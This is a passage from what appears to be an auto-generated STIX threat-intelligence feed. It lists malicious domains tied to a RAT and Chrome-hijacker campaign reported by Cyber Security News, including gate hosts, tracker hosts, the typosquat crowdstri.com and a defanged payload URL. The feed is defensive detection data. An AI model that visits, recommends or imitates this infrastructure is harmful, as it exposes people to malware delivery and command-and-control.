breathdoctor[.]xyz ; bubbleslip[.","pattern":"[domain-name:value = 'boytank.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--db193367-6d97-45a4-a4dc-819a67b2b908","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: branchmorning.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: oatthought[.]xyz ; boundarychickens[.]xyz ; boytank[.]xyz ; branchmorning[.]xyz ; breathdoctor[.]xyz ; bubbleslip[.]xyz ; cabbagemeasure[","pattern":"[domain-name:value = 'branchmorning.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f1919f34-1bee-43bb-8917-d1722eec25e4","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: breathdoctor.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ndarychickens[.]xyz ; boytank[.]xyz ; branchmorning[.]xyz ; breathdoctor[.]xyz ; bubbleslip[.]xyz ; cabbagemeasure[.]xyz ; cablecanvas[.","pattern":"[domain-name:value = 'breathdoctor.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--42193d9b-e439-404f-8149-69b38c5e9880","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: bubbleappliance.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: .believesisters[.]xyz ; connect.boundaryfly[.]xyz ; connect.bubbleappliance[.]xyz ; connect.cableland[.]xyz ; connect.chinexpert[.]xyz ; co","pattern":"[domain-name:value = 'bubbleappliance.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ebbeb70b-1ec8-4341-90f6-8658ac4daad3","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: bubbleslip.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: boytank[.]xyz ; branchmorning[.]xyz ; breathdoctor[.]xyz ; bubbleslip[.]xyz ; cabbagemeasure[.]xyz ; cablecanvas[.]xyz ; cardgrape[.]","pattern":"[domain-name:value = 'bubbleslip.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7709015f-958a-40d0-8b65-4f091fd6000b","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: cabbagemeasure.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: anchmorning[.]xyz ; breathdoctor[.]xyz ; bubbleslip[.]xyz ; cabbagemeasure[.]xyz ; cablecanvas[.]xyz ; cardgrape[.]xyz ; cattlegold[.]xyz","pattern":"[domain-name:value = 'cabbagemeasure.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ab54512b-e265-49dc-bd65-36571854d67d","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: cablecanvas.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: athdoctor[.]xyz ; bubbleslip[.]xyz ; cabbagemeasure[.]xyz ; cablecanvas[.]xyz ; cardgrape[.]xyz ; cattlegold[.]xyz ; celeryerror[.]xyz","pattern":"[domain-name:value = 'cablecanvas.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--325381fa-08ee-411d-b3d3-c65e6a0f6128","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: cableland.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: boundaryfly[.]xyz ; connect.bubbleappliance[.]xyz ; connect.cableland[.]xyz ; connect.chinexpert[.]xyz ; connect.conditiongrade[.]xyz","pattern":"[domain-name:value = 'cableland.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f695c97e-fd9d-47ff-9d02-99094d187e70","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: cardgrape.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: bbleslip[.]xyz ; cabbagemeasure[.]xyz ; cablecanvas[.]xyz ; cardgrape[.]xyz ; cattlegold[.]xyz ; celeryerror[.]xyz ; centscarf[.]xyz","pattern":"[domain-name:value = 'cardgrape.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9b47783a-5c3b-4461-bd28-e155ddef6434","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: cattlegold.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: abbagemeasure[.]xyz ; cablecanvas[.]xyz ; cardgrape[.]xyz ; cattlegold[.]xyz ; celeryerror[.]xyz ; centscarf[.]xyz CL-CRI-1171 gate an","pattern":"[domain-name:value = 'cattlegold.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b8904d35-299f-47ae-9044-b9401f1033c8","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: celeryerror.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ; cablecanvas[.]xyz ; cardgrape[.]xyz ; cattlegold[.]xyz ; celeryerror[.]xyz ; centscarf[.]xyz CL-CRI-1171 gate and landing infrastruc","pattern":"[domain-name:value = 'celeryerror.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--50c4c671-5d74-4b30-b24b-bbbeee1acc24","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: centscarf.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ; cardgrape[.]xyz ; cattlegold[.]xyz ; celeryerror[.]xyz ; centscarf[.]xyz CL-CRI-1171 gate and landing infrastructure Domain chalkp","pattern":"[domain-name:value = 'centscarf.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d0df2d07-8c6a-4da7-854f-e8bfc54a8ecd","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: chalkprose.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: rf[.]xyz CL-CRI-1171 gate and landing infrastructure Domain chalkprose[.]xyz ; cherriestruck[.]space ; chesstail[.]xyz ; chickensmine[","pattern":"[domain-name:value = 'chalkprose.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c79a48e7-a2df-4395-a4c6-1dfca67093f6","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: chawton.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: tructure Domain voyagemist[.]space ; statementtouch[.]xyz ; chawton[.]info OfferLoader payload handoff and second-stage hosts Domain","pattern":"[domain-name:value = 'chawton.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2cf0f40d-3bbb-477f-b965-d350e0825124","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: cherriestruck.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: 1 gate and landing infrastructure Domain chalkprose[.]xyz ; cherriestruck[.]space ; chesstail[.]xyz ; chickensmine[.]space ; churchpail[.]x","pattern":"[domain-name:value = 'cherriestruck.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ae0bce53-c4d1-42c0-b0ed-3ac9d6711669","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: chesstail.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: structure Domain chalkprose[.]xyz ; cherriestruck[.]space ; chesstail[.]xyz ; chickensmine[.]space ; churchpail[.]xyz ; clothcrib[.]x","pattern":"[domain-name:value = 'chesstail.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8e9f4a43-e291-4afb-aa33-ef048f15dbb7","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: chickensmine.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: halkprose[.]xyz ; cherriestruck[.]space ; chesstail[.]xyz ; chickensmine[.]space ; churchpail[.]xyz ; clothcrib[.]xyz ; clothcurrent[.]xyz","pattern":"[domain-name:value = 'chickensmine.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d4164521-7d5b-4128-9d45-0b13a3458dbf","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: chinexpert.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: t.bubbleappliance[.]xyz ; connect.cableland[.]xyz ; connect.chinexpert[.]xyz ; connect.conditiongrade[.]xyz ; connect.coppersummer[.]x","pattern":"[domain-name:value = 'chinexpert.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--564a15cf-e9e5-4ea9-a6dd-5ece5bd0ab9f","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: churchpail.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: iestruck[.]space ; chesstail[.]xyz ; chickensmine[.]space ; churchpail[.]xyz ; clothcrib[.]xyz ; clothcurrent[.]xyz ; coatberry[.]xyz","pattern":"[domain-name:value = 'churchpail.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--92208f39-fc67-4f82-bd22-74a554647c98","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: clothcrib.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: chesstail[.]xyz ; chickensmine[.]space ; churchpail[.]xyz ; clothcrib[.]xyz ; clothcurrent[.]xyz ; coatberry[.]xyz CL-CRI-1171 gate a","pattern":"[domain-name:value = 'clothcrib.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4a02cd38-9da2-4773-997d-26cdec6cc378","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: clothcurrent.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: chickensmine[.]space ; churchpail[.]xyz ; clothcrib[.]xyz ; clothcurrent[.]xyz ; coatberry[.]xyz CL-CRI-1171 gate and landing infrastruc","pattern":"[domain-name:value = 'clothcurrent.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2fee8858-138e-435e-b9b7-228c4988cb16","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: coatberry.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ; churchpail[.]xyz ; clothcrib[.]xyz ; clothcurrent[.]xyz ; coatberry[.]xyz CL-CRI-1171 gate and landing infrastructure Domain connec","pattern":"[domain-name:value = 'coatberry.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9dfa17ec-c9c2-4d19-b932-74a9e78384d0","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: collartitle.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ect.fuelleg[.]info ; vesselsystem[.]xyz ; minewave[.]info ; collartitle[.]info ; boardmagic[.]info ; placespoon[.]xyz ; needcherries[.]o","pattern":"[domain-name:value = 'collartitle.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--83297a03-ab3c-4c03-9b72-bb104e9079f8","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: conditiongrade.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: onnect.cableland[.]xyz ; connect.chinexpert[.]xyz ; connect.conditiongrade[.]xyz ; connect.coppersummer[.]xyz ; connect.creatorcreator[.]x","pattern":"[domain-name:value = 'conditiongrade.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ddbd4f8d-efa0-42ae-b517-270756171c57","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: coppersummer.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: t.chinexpert[.]xyz ; connect.conditiongrade[.]xyz ; connect.coppersummer[.]xyz ; connect.creatorcreator[.]xyz ; connect.dresstent[.]xyz","pattern":"[domain-name:value = 'coppersummer.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5188655b-319c-47a3-9934-8a2a6c9bfffa","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: creatorcreator.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: conditiongrade[.]xyz ; connect.coppersummer[.]xyz ; connect.creatorcreator[.]xyz ; connect.dresstent[.]xyz ; connect.dropjeans[.]xyz ; con","pattern":"[domain-name:value = 'creatorcreator.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4ef4bc23-3d24-4e28-9f67-527176967d38","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: crowdstri.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: cript host Domain stryper[.]info ; aa.amazingshield[.]xyz ; crowdstri[.]com Insomnia RAT stage hosts and Python-agent C2 typosquat Do","pattern":"[domain-name:value = 'crowdstri.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--08e60c03-17f8-4d44-8625-a4503ca2ac33","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: drelto.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: 6546.py Stage-three Python Insomnia RAT agent URL hxxps[:]//drelto[.]info/farlix Search-result injection script host Domain stryper","pattern":"[domain-name:value = 'drelto.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b4eec4aa-6231-4b33-ac39-ff9742682213","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: dresstent.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: coppersummer[.]xyz ; connect.creatorcreator[.]xyz ; connect.dresstent[.]xyz ; connect.dropjeans[.]xyz ; connect.edgeplayground[.]xyz","pattern":"[domain-name:value = 'dresstent.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--499ce842-8d1d-4591-b8a8-6cd135bb62b1","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: dropjeans.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ct.creatorcreator[.]xyz ; connect.dresstent[.]xyz ; connect.dropjeans[.]xyz ; connect.edgeplayground[.]xyz ; connect.exchangeclub[.]x","pattern":"[domain-name:value = 'dropjeans.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2a0d0d9b-a333-4035-93ba-dbac2525d904","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: edgeplayground.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: connect.dresstent[.]xyz ; connect.dropjeans[.]xyz ; connect.edgeplayground[.]xyz ; connect.exchangeclub[.]xyz CL-CRI-1171 installation-tra","pattern":"[domain-name:value = 'edgeplayground.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--71dcc7c6-37e2-44f5-8625-9b5c9740d807","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: exchangeclub.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ct.dropjeans[.]xyz ; connect.edgeplayground[.]xyz ; connect.exchangeclub[.]xyz CL-CRI-1171 installation-tracker infrastructure Domain co","pattern":"[domain-name:value = 'exchangeclub.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--711ac542-3785-465b-b687-d9c1c4fbdb3f","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: existencediscussion.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: CRI-1171 installation-tracker infrastructure Domain connect.existencediscussion[.]info ; connect.expansionsalt[.]info ; connect.fangstitch[.]xyz","pattern":"[domain-name:value = 'existencediscussion.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--377eba9f-efd8-4189-a1b5-86a17fd9953b","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: expansionsalt.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ructure Domain connect.existencediscussion[.]info ; connect.expansionsalt[.]info ; connect.fangstitch[.]xyz ; connect.fogparcel[.]info ; c","pattern":"[domain-name:value = 'expansionsalt.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--389cbc52-fef0-479e-8664-16fbb6a4f7fe","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: extentrack.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: Domain vendralo[.]info ; finersto[.]com ; mqsearch[.]com ; extentrack[.]com ; drelto[.]info Docro Hijacker rule delivery, telemetry,","pattern":"[domain-name:value = 'extentrack.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--008aca64-a4fe-40c5-abeb-80df5b6d68db","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: 